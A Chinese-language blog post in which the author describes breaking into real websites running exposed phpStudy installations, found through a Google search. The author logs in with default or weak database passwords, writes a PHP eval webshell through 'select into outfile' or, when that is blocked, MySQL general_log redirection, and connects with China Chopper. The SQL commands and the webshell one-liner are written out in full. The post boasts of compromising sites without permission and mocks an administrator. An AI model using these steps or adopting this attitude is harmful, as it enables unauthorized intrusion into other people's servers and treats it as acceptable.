標籤:日誌 like 設定 使用者 方法 圖片 冰山一角 關鍵詞 phpstudy
——真正的才智是剛毅的志向。
今天沒學多少東西,直到下午在看別人的文章的時候看到了phpstudy0day的關鍵詞,好奇就查了查。其實這個洞有一段時間了,然後就準備google試試還能不能找到有洞的網站,直接google搜phpstudy 探針 2014。結果是這樣的 ,我不得不感歎google太強了。
前幾頁我就不打算看了,基本上已經被日穿了,或者洞補了。所以乾脆向後面翻,說實話運氣很重要,我剛嘗試了第一個網站就成了。
首先,點開網站是這樣的:
我們要用到的就是這個MySQL資料庫連接檢測功能,我們嘗試弱口令,也就是預設使用者名密碼 root root登入試試,如果提示
則說明口令是對的,有機會拿下來,所以接下來就是目錄預設的/phpmyadmin利用上面的使用者名稱密碼登入
接下來就是之前寫過的方法拿shell了,在資料庫中利用select into outfile方法寫入shell,非常簡單過程就不寫了,這裡面的絕對路徑在探針那個頁面有。
接下來要說的是後來遇到的一個奇葩的站,剛把這個站拿下來,準備再去試一試其他的站,就遇到了我要說的這個目標站,當我開啟網站的時候,並沒有顯示php探針的頁面,而是回顯了一個內容為Hello world的頁面,我tm.... 完全不慌!
既然是phpstudy的,那在嘗試一下phpmyadmin這個目錄,沒準這個存在呢,結果一試 臥槽,真有。 瞬間我就樂了,心裡是想著這個管理員一定是加了個index.php頁面但是還是預設的使用者名稱密碼,然後就開開心心的去串連他的資料庫了,結果提示我1045錯誤,這。。。。密碼不對??本來滲透到這應該就結束了,但是順手就試了一下其他弱口令,結果,結果我就用123456進去了.....進去了!!這管理員這智商我不想說什麼了。。
這就好辦了 接下來就是select into outfile寫shell了,後來發現我錯了,這個管理員還是有點安全意識的,因為outfile被禁止了,那我豈不是搞不定這個網站了! 不存在的,首先我們要是root許可權,然後可以在日誌中寫入shell。 方法如下:
show variables like ‘%general%‘; #查看配置set global general_log = on; #開啟general log 模式set global general_log_file = ‘C:/phpstudy/www/xx.php‘; #設定日誌目錄為shell地址select ‘<?php eval($_POST[cmd]);?>‘ 寫入shell
這裡當時我還遇到了個問題,因為看不到php探針 所以不知道網站的絕對目錄,因為phpstudy安裝的時候,在目錄下還有個phpinfo.php的檔案,訪問這個也能查看到絕對路徑。(也可以phpmyadmin爆路徑等)
掛了個圖純屬為了裝逼,(誰讓我還沒到那種大牛的地步,現階段只能裝裝逼來鼓勵自己了~)剩下的就是菜刀串連了。這個漏洞的原因百度一下有很多,這裡就不多說了。
這一條路還有很長很長要走,會的只是冰山一角,希望自己不要自負,踏實前行,共勉!
(實戰)phpstudy的漏洞+資料庫日誌寫shell